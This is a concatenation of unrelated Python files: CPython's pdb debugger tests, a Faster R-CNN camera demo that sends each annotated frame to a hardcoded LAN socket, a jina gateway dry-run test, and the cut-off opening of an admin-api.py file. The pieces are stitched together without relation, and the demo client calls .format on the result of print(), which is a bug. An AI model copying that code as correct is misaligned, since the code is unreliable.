... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
(Pdb) continue
2
finished
"""
def test_pdb_until_command_for_coroutine():
"""Testing no unwindng stack for coroutines
for "until" command if target breakpoint is not reached
>>> import asyncio
>>> async def test_coro():
... print(0)
... await asyncio.sleep(0)
... print(1)
... await asyncio.sleep(0)
... print(2)
... await asyncio.sleep(0)
... print(3)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 8',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) until 8
0
1
2
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(8)test_coro()
-> print(3)
(Pdb) continue
3
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controlled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> reset_Breakpoint()
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 1 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_issue_20766():
"""Test for reference leaks when the SIGINT handler is set.
>>> def test_function():
... i = 1
... while i <= 2:
... sess = pdb.Pdb()
... sess.set_trace(sys._getframe())
... print('pdb %d: %s' % (i, sess._previous_sigint_handler))
... i += 1
>>> reset_Breakpoint()
>>> with PdbTestInput(['continue',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 1: <built-in function default_int_handler>
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 2: <built-in function default_int_handler>
"""
def test_pdb_issue_43318():
"""echo breakpoints cleared with filename:lineno
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
>>> reset_Breakpoint()
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'clear <doctest test.test_pdb.test_pdb_issue_43318[0]>:3',
... 'continue'
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_43318[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
(Pdb) clear <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
(Pdb) continue
1
2
3
4
"""
class PdbTestCase(unittest.TestCase):
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def _run_pdb(self, pdb_args, commands):
self.addCleanup(os_helper.rmtree, '__pycache__')
cmd = [sys.executable, '-m', 'pdb'] + pdb_args
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env = {**os.environ, 'PYTHONIOENCODING': 'utf-8'}
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
def run_pdb_script(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(os_helper.unlink, filename)
return self._run_pdb([filename], commands)
def run_pdb_module(self, script, commands):
"""Runs the script code as part of a module"""
self.module_name = 't_main'
os_helper.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
pass
with open(main_file, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(os_helper.rmtree, self.module_name)
return self._run_pdb(['-m', self.module_name], commands)
def _assert_find_function(self, file_content, func_name, expected):
with open(os_helper.TESTFN, 'wb') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], os_helper.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, os_helper.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function(b'', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode(),
'bœr',
('bœr', 4),
)
def test_find_function_found_with_encoding_cookie(self):
self._assert_find_function(
"""\
# coding: iso-8859-15
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode('iso-8859-15'),
'bœr',
('bœr', 5),
)
def test_find_function_found_with_bom(self):
self._assert_find_function(
codecs.BOM_UTF8 + """\
def bœr():
pass
""".encode(),
'bœr',
('bœr', 1),
)
def test_issue7964(self):
# open the file as binary so we can force \r\n newline
with open(os_helper.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', os_helper.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
self.addCleanup(os_helper.unlink, 'bar.py')
stdout, stderr = self.run_pdb_script(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Fail to step into the caller after a return')
def test_issue13120(self):
# Invoking "continue" on a non-main thread triggered an exception
# inside signal.signal.
with open(os_helper.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
pdb.Pdb(readrc=False).set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', os_helper.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env={**os.environ, 'PYTHONIOENCODING': 'utf-8'}
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn(b'Error', stdout,
"Got an error running test script under PDB")
def test_issue36250(self):
with open(os_helper.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
evt = threading.Event()
def start_pdb():
evt.wait()
pdb.Pdb(readrc=False).set_trace()
t = threading.Thread(target=start_pdb)
t.start()
pdb.Pdb(readrc=False).set_trace()
evt.set()
t.join()""").encode('ascii'))
cmd = [sys.executable, '-u', os_helper.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env = {**os.environ, 'PYTHONIOENCODING': 'utf-8'}
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\ncont\n')
self.assertNotIn(b'Error', stdout,
"Got an error running test script under PDB")
def test_issue16180(self):
# A syntax error in the debuggee.
script = "def f: pass\n"
commands = ''
expected = "SyntaxError:"
stdout, stderr = self.run_pdb_script(script, commands)
self.assertIn(expected, stdout,
'\n\nExpected:\n{}\nGot:\n{}\n'
'Fail to handle a syntax error in the debuggee.'
.format(expected, stdout))
def test_issue26053(self):
# run command of pdb prompt echoes the correct args
script = "print('hello')"
commands = """
continue
run a b c
run d e f
quit
"""
stdout, stderr = self.run_pdb_script(script, commands)
res = '\n'.join([x.strip() for x in stdout.splitlines()])
self.assertRegex(res, "Restarting .* with arguments:\na b c")
self.assertRegex(res, "Restarting .* with arguments:\nd e f")
def test_readrc_kwarg(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb(readrc=False).set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with os_helper.temp_cwd():
with open('.pdbrc', 'w') as f:
f.write("invalid\n")
with open('main.py', 'w') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
with proc:
stdout, stderr = proc.communicate(b'q\n')
self.assertNotIn(b"NameError: name 'invalid' is not defined",
stdout)
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_readrc_homedir(self):
save_home = os.environ.pop("HOME", None)
with os_helper.temp_dir() as temp_dir, patch("os.path.expanduser"):
rc_path = os.path.join(temp_dir, ".pdbrc")
os.path.expanduser.return_value = rc_path
try:
with open(rc_path, "w") as f:
f.write("invalid")
self.assertEqual(pdb.Pdb().rcLines[0], "invalid")
finally:
if save_home is not None:
os.environ["HOME"] = save_home
def test_read_pdbrc_with_ascii_encoding(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb().set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with os_helper.temp_cwd():
with open('.pdbrc', 'w', encoding='utf-8') as f:
f.write("Fran\u00E7ais")
with open('main.py', 'w', encoding='utf-8') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
env = {'PYTHONIOENCODING': 'ascii'}
if sys.platform == 'win32':
env['PYTHONLEGACYWINDOWSSTDIO'] = 'non-empty-string'
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
env={**os.environ, **env}
)
with proc:
stdout, stderr = proc.communicate(b'c\n')
self.assertIn(b"UnicodeEncodeError: \'ascii\' codec can\'t encode character "
b"\'\\xe7\' in position 21: ordinal not in range(128)", stderr)
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_header(self):
stdout = StringIO()
header = 'Nobody expects... blah, blah, blah'
with ExitStack() as resources:
resources.enter_context(patch('sys.stdout', stdout))
resources.enter_context(patch.object(pdb.Pdb, 'set_trace'))
pdb.set_trace(header=header)
self.assertEqual(stdout.getvalue(), header + '\n')
def test_run_module(self):
script = """print("SUCCESS")"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_module_is_run_as_main(self):
script = """
if __name__ == '__main__':
print("SUCCESS")
"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_breakpoint(self):
script = """
if __name__ == '__main__':
pass
print("SUCCESS")
pass
"""
commands = """
b 3
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("Breakpoint 1 at" in l for l in stdout.splitlines()), stdout)
self.assertTrue(all("SUCCESS" not in l for l in stdout.splitlines()), stdout)
def test_run_pdb_with_pdb(self):
commands = """
c
quit
"""
stdout, stderr = self._run_pdb(["-m", "pdb"], commands)
self.assertIn(
pdb._usage,
stdout.replace('\r', '') # remove \r for windows
)
def test_module_without_a_main(self):
module_name = 't_main'
os_helper.rmtree(module_name)
init_file = module_name + '/__init__.py'
os.mkdir(module_name)
with open(init_file, 'w') as f:
pass
self.addCleanup(os_helper.rmtree, module_name)
stdout, stderr = self._run_pdb(['-m', module_name], "")
self.assertIn("ImportError: No module named t_main.__main__",
stdout.splitlines())
def test_blocks_at_first_code_line(self):
script = """
#This is a comment, on line 2
print("SUCCESS")
"""
commands = """
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("__main__.py(4)<module>()"
in l for l in stdout.splitlines()), stdout)
def test_relative_imports(self):
self.module_name = 't_main'
os_helper.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(os_helper.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import top_var
from .module import var
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
var2 = "second var"
"""))
commands = """
b 5
c
p top_var
p var
p module.var2
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
self.assertTrue(any("VAR from top" in l for l in stdout.splitlines()))
self.assertTrue(any("second var" in l for l in stdout.splitlines()))
def test_relative_imports_on_plain_module(self):
# Validates running a plain module. See bpo32691
self.module_name = 't_main'
os_helper.rmtree(self.module_name)
main_file = self.module_name + '/runme.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(os_helper.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
"""))
commands = """
b 3
c
p module.var
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name + '.runme'], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
def test_errors_in_command(self):
commands = "\n".join([
'print(',
'debug print(',
'debug doesnotexist',
'c',
])
stdout, _ = self.run_pdb_script('pass', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'-> pass',
'(Pdb) *** SyntaxError: \'(\' was never closed',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'*** SyntaxError: \'(\' was never closed',
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'> <string>(1)<module>()',
"((Pdb)) *** NameError: name 'doesnotexist' is not defined",
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ',
])
def test_issue34266(self):
'''do_run handles exceptions from parsing its arg'''
def check(bad_arg, msg):
commands = "\n".join([
f'run {bad_arg}',
'q',
])
stdout, _ = self.run_pdb_script('pass', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'-> pass',
f'(Pdb) *** Cannot run {bad_arg}: {msg}',
'(Pdb) ',
])
check('\\', 'No escaped character')
check('"', 'No closing quotation')
def test_issue42384(self):
'''When running `python foo.py` sys.path[0] is an absolute path. `python -m pdb foo.py` should behave the same'''
script = textwrap.dedent("""
import sys
print('sys.path[0] is', sys.path[0])
""")
commands = 'c\nq'
with os_helper.temp_cwd() as cwd:
expected = f'(Pdb) sys.path[0] is {os.path.realpath(cwd)}'
stdout, stderr = self.run_pdb_script(script, commands)
self.assertEqual(stdout.split('\n')[2].rstrip('\r'), expected)
@os_helper.skip_unless_symlink
def test_issue42384_symlink(self):
'''When running `python foo.py` sys.path[0] resolves symlinks. `python -m pdb foo.py` should behave the same'''
script = textwrap.dedent("""
import sys
print('sys.path[0] is', sys.path[0])
""")
commands = 'c\nq'
with os_helper.temp_cwd() as cwd:
cwd = os.path.realpath(cwd)
dir_one = os.path.join(cwd, 'dir_one')
dir_two = os.path.join(cwd, 'dir_two')
expected = f'(Pdb) sys.path[0] is {dir_one}'
os.mkdir(dir_one)
with open(os.path.join(dir_one, 'foo.py'), 'w') as f:
f.write(script)
os.mkdir(dir_two)
os.symlink(os.path.join(dir_one, 'foo.py'), os.path.join(dir_two, 'foo.py'))
stdout, stderr = self._run_pdb([os.path.join('dir_two', 'foo.py')], commands)
self.assertEqual(stdout.split('\n')[2].rstrip('\r'), expected)
def test_issue42383(self):
with os_helper.temp_cwd() as cwd:
with open('foo.py', 'w') as f:
s = textwrap.dedent("""
print('The correct file was executed')
import os
os.chdir("subdir")
""")
f.write(s)
subdir = os.path.join(cwd, 'subdir')
os.mkdir(subdir)
os.mkdir(os.path.join(subdir, 'subdir'))
wrong_file = os.path.join(subdir, 'foo.py')
with open(wrong_file, 'w') as f:
f.write('print("The wrong file was executed")')
stdout, stderr = self._run_pdb(['foo.py'], 'c\nc\nq')
expected = '(Pdb) The correct file was executed'
self.assertEqual(stdout.split('\n')[6].rstrip('\r'), expected)
class ChecklineTests(unittest.TestCase):
def setUp(self):
linecache.clearcache() # Pdb.checkline() uses linecache.getline()
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test_checkline_before_debugging(self):
with open(os_helper.TESTFN, "w") as f:
f.write("print(123)")
db = pdb.Pdb()
self.assertEqual(db.checkline(os_helper.TESTFN, 1), 1)
def test_checkline_after_reset(self):
with open(os_helper.TESTFN, "w") as f:
f.write("print(123)")
db = pdb.Pdb()
db.reset()
self.assertEqual(db.checkline(os_helper.TESTFN, 1), 1)
def test_checkline_is_not_executable(self):
with open(os_helper.TESTFN, "w") as f:
# Test for comments, docstrings and empty lines
s = textwrap.dedent("""
# Comment
\"\"\" docstring \"\"\"
''' docstring '''
""")
f.write(s)
db = pdb.Pdb()
num_lines = len(s.splitlines()) + 2 # Test for EOF
for lineno in range(num_lines):
self.assertFalse(db.checkline(os_helper.TESTFN, lineno))
def load_tests(*args):
from test import test_pdb
suites = [
unittest.makeSuite(PdbTestCase),
unittest.makeSuite(ChecklineTests),
doctest.DocTestSuite(test_pdb)
]
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main()
|
client.py
|
#!/usr/bin/env python
import os
import sys
import argparse
import numpy as np
import cv2
import _init_paths
from fast_rcnn.config import cfg
from fast_rcnn.test import im_detect
from fast_rcnn.nms_wrapper import nms
from utils.timer import Timer
import caffe, os, sys, cv2
import socket
from PIL import Image
from time import sleep
import threading
VOC_CLASSES = ('__background__',
'aeroplane', 'bicycle', 'bird', 'boat',
'bottle', 'bus', 'car', 'cat', 'chair',
'cow', 'diningtable', 'dog', 'horse',
'motorbike', 'person', 'pottedplant',
'sheep', 'sofa', 'train', 'tvmonitor')
COLORS = ((0,0,0),
(0,0,204), (0,102,204), (0,204,204), (0,204,0),
(204,204,0), (204,102,0), (204,0,0), (204,0,102),
(204,0,102), (102,0,204), (153,153,255), (153,204,255),
(153,255,255), (153,255,153), (255,255,153), (255,204,153),
(255,153,153), (255,153,204), (255,153,255), (204,153,255))
DEFAULT_PROTOTXT = 'models/pascal_voc/VGG16/faster_rcnn_end2end/test.prototxt'
DEFAULT_MODEL = 'data/faster_rcnn_models/VGG16_faster_rcnn_final.caffemodel'
windowName = 'FRCN-demo'
def vis_detections_cv(im, det_list, cls_list, thresh=0.5):
"""Draw detected bounding boxes."""
assert len(det_list) == len(cls_list)
for i in range(len(det_list)):
bbox = det_list[i][:4]
score = det_list[i][-1]
cls = cls_list[i]
cv2.rectangle(im, (bbox[0],bbox[1]), (bbox[2],bbox[3]), COLORS[cls], 2)
txt = '{:s} {:.2f}'.format(VOC_CLASSES[cls], score)
cv2.putText(im, txt, (int(bbox[0])+1,int(bbox[1])-2), cv2.FONT_HERSHEY_PLAIN, 1.0, (32,32,32), 4, cv2.LINE_AA)
cv2.putText(im, txt, (int(bbox[0]),int(bbox[1])-2), cv2.FONT_HERSHEY_PLAIN, 1.0, (240,240,240), 1, cv2.LINE_AA)
return im
def demo(net, im):
"""Detect object classes in an image using pre-computed object proposals."""
timer = Timer()
timer.tic()
scores, boxes = im_detect(net, im)
timer.toc()
det_list = [] # list of final detection boxes and scores
cls_list = [] # list of detection class
CONF_THRESH = 0.8
NMS_THRESH = 0.1
for cls_ind, cls in enumerate(VOC_CLASSES[1:]):
cls_ind += 1 # because we skipped background
cls_boxes = boxes[:, 4*cls_ind:4*(cls_ind + 1)]
cls_scores = scores[:, cls_ind]
dets = np.hstack((cls_boxes,
cls_scores[:, np.newaxis])).astype(np.float32)
keep = nms(dets, NMS_THRESH)
dets = dets[keep, :]
inds = np.where(dets[:, -1] >= CONF_THRESH)[0]
for i in inds:
det_list.append(dets[i])
cls_list.extend([cls_ind] * len(inds))
print('Detection took {:.3f}s and found {:d} objects').format(timer.total_time, len(det_list))
return vis_detections_cv(im, det_list, cls_list, thresh=CONF_THRESH)
def parse_args():
"""Parse input arguments."""
parser = argparse.ArgumentParser(description='Faster RCNN demo with camera')
parser.add_argument('--gpu', dest='gpu_id', help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--cpu', dest='cpu_mode',
help='Use CPU mode (overrides --gpu)',
action='store_true')
parser.add_argument('--rtsp', dest='use_rtsp',
help='use IP CAM (remember to also set --uri)',
action='store_true')
parser.add_argument('--uri', dest='rtsp_uri',
help='RTSP URI string, e.g. rtsp://192.168.1.64:554',
default=None, type=str)
parser.add_argument('--latency', dest='rtsp_latency',
help='latency in ms for RTSP [200]',
default=200, type=int)
parser.add_argument('--usb', dest='use_usb',
help='use USB webcam (remember to also set --vid)',
action='store_true')
parser.add_argument('--vid', dest='video_dev',
help='video device # of USB webcam (/dev/video?) [1]',
default=1, type=int)
parser.add_argument('--width', dest='image_width',
help='image width [640]',
default=640, type=int)
parser.add_argument('--height', dest='image_height',
help='image width [480]',
default=480, type=int)
parser.add_argument('--prototxt', dest='caffe_prototxt',
help='caffe prototxt of the Faster RCNN model [{}]'.format(DEFAULT_PROTOTXT),
default=DEFAULT_PROTOTXT, type=str)
parser.add_argument('--model', dest='caffe_model',
help='the caffemodel (weights) file [{}]'.format(DEFAULT_MODEL),
default=DEFAULT_MODEL, type=str)
args = parser.parse_args()
return args
def open_cam_rtsp(uri, width, height, latency):
gst_str = ('rtspsrc location={} latency={} ! rtph264depay ! h264parse ! omxh264dec ! nvvidconv ! video/x-raw, width=(int){}, height=(int){}, format=(string)BGRx ! videoconvert ! appsink').format(uri, latency, width, height)
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
def open_cam_usb(dev, width, height):
# We want to set width and height here, otherwise we could just do:
# return cv2.VideoCapture(dev)
gst_str = 'v4l2src device=/dev/video{} ! video/x-raw, width=(int){}, height=(int){}, format=(string)RGB ! videoconvert ! appsink'.format(dev, width, height)
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
def open_cam_onboard(width, height):
# On versions of L4T previous to L4T 28.1, flip-method=2
# Use Jetson onboard camera
gst_str = 'nvcamerasrc ! video/x-raw(memory:NVMM), width=(int)1920, height=(int)1080, format=(string)I420, framerate=(fraction)30/1 ! nvvidconv ! video/x-raw, width=(int){}, height=(int){}, format=(string)BGRx ! videoconvert ! appsink'.format(width, height)
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
def open_window(width, height):
cv2.namedWindow(windowName, cv2.WINDOW_AUTOSIZE)
cv2.resizeWindow(windowName, width, height)
#cv2.moveWindow(windowName, 0, 0)
cv2.setWindowTitle(windowName, 'Faster RCNN camera demo')
def transmit():
s = socket.socket()
s.connect(("192.168.1.124",9090))
f = open ("/home/nvidia/project/py-faster-rcnn/1.jpg", "rb")
l = f.read(1024)
while (l):
s.send(l)
l = f.read(1024)
s.close()
if __name__ == '__main__':
cfg.TEST.HAS_RPN = True # Use RPN for proposals
args = parse_args()
if not os.path.isfile(args.caffe_prototxt):
sys.exit('{} not found!'.format(args.caffe_prototxt))
if not os.path.isfile(args.caffe_model):
sys.exit('{} not found!'.format(args.caffe_model))
if args.cpu_mode:
caffe.set_mode_cpu()
else:
caffe.set_mode_gpu()
caffe.set_device(args.gpu_id)
cfg.GPU_ID = args.gpu_id
net = caffe.Net(args.caffe_prototxt, args.caffe_model, caffe.TEST)
# Warm-up with 2 dummy images
im = 128 * np.ones((640, 480, 3), dtype=np.uint8)
for i in xrange(2):
_, _= im_detect(net, im)
if args.use_rtsp:
cap = open_cam_rtsp(args.rtsp_uri, args.image_width, args.image_height, args.rtsp_latency)
elif args.use_usb:
cap = open_cam_usb(args.video_dev, args.image_width, args.image_height)
else: # by default, use the Jetson onboard camera
cap = open_cam_onboard(args.image_width, args.image_height)
if not cap.isOpened():
sys.exit('Failed to open camera!')
open_window(args.image_width, args.image_height)
while True:
if cv2.getWindowProperty(windowName, 0) < 0: break # display window terminated by user
ret_val, img = cap.read();
if not ret_val: break # image capture failed
img = demo(net, img)
cv2.imshow(windowName, img)
im = Image.fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
im.save('1.jpg')
t = threading.Thread(target=transmit)
t.start()
t.join()
key = cv2.waitKey(1)
if key == 27: break # ESC key pressed
cap.release()
cv2.destroyAllWindows()
|
test_gateway_dry_run.py
|
import asyncio
import json
import multiprocessing
import threading
import time
from collections import defaultdict
import pytest
from jina import Client, Document, Executor, requests
from jina.enums import PollingType
from jina.parsers import set_gateway_parser, set_pod_parser
from jina.serve.runtimes.asyncio import AsyncNewLoopRuntime
from jina.serve.runtimes.gateway.grpc import GRPCGatewayRuntime
from jina.serve.runtimes.gateway.http import HTTPGatewayRuntime
from jina.serve.runtimes.gateway.websocket import WebSocketGatewayRuntime
from jina.serve.runtimes.worker import WorkerRuntime
def _create_worker_runtime(port, name='', executor=None):
args = set_pod_parser().parse_args([])
args.port = port
args.name = name
if executor:
args.uses = executor
with WorkerRuntime(args) as runtime:
runtime.run_forever()
def _create_gateway_runtime(graph_description, pod_addresses, port, protocol='grpc'):
if protocol == 'http':
gateway_runtime = HTTPGatewayRuntime
elif protocol == 'websocket':
gateway_runtime = WebSocketGatewayRuntime
else:
gateway_runtime = GRPCGatewayRuntime
with gateway_runtime(
set_gateway_parser().parse_args(
[
'--graph-description',
graph_description,
'--deployments-addresses',
pod_addresses,
'--port',
str(port),
]
)
) as runtime:
runtime.run_forever()
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_dry_run_of_flow(port_generator, protocol):
worker_port = port_generator()
port = port_generator()
graph_description = '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
pod_addresses = f'{{"pod0": ["0.0.0.0:{worker_port}"]}}'
# create a single worker runtime
worker_process = multiprocessing.Process(
target=_create_worker_runtime, args=(worker_port,)
)
worker_process.start()
# create a single gateway runtime
gateway_process = multiprocessing.Process(
target=_create_gateway_runtime,
args=(graph_description, pod_addresses, port, protocol),
)
gateway_process.start()
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ctrl_address=f'0.0.0.0:{worker_port}',
ready_or_shutdown_event=multiprocessing.Event(),
)
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ctrl_address=f'0.0.0.0:{port}',
ready_or_shutdown_event=multiprocessing.Event(),
)
# send requests to the gateway
c = Client(host='localhost', port=port, asyncio=True, protocol=protocol)
dry_run_alive = c.dry_run()
worker_process.terminate()
worker_process.join()
dry_run_worker_removed = c.dry_run()
gateway_process.terminate()
gateway_process.join()
assert dry_run_alive
assert not dry_run_worker_removed
assert gateway_process.exitcode == 0
assert worker_process.exitcode == 0
|
admin-api.py
|
#!/usr/bin/python3
import json
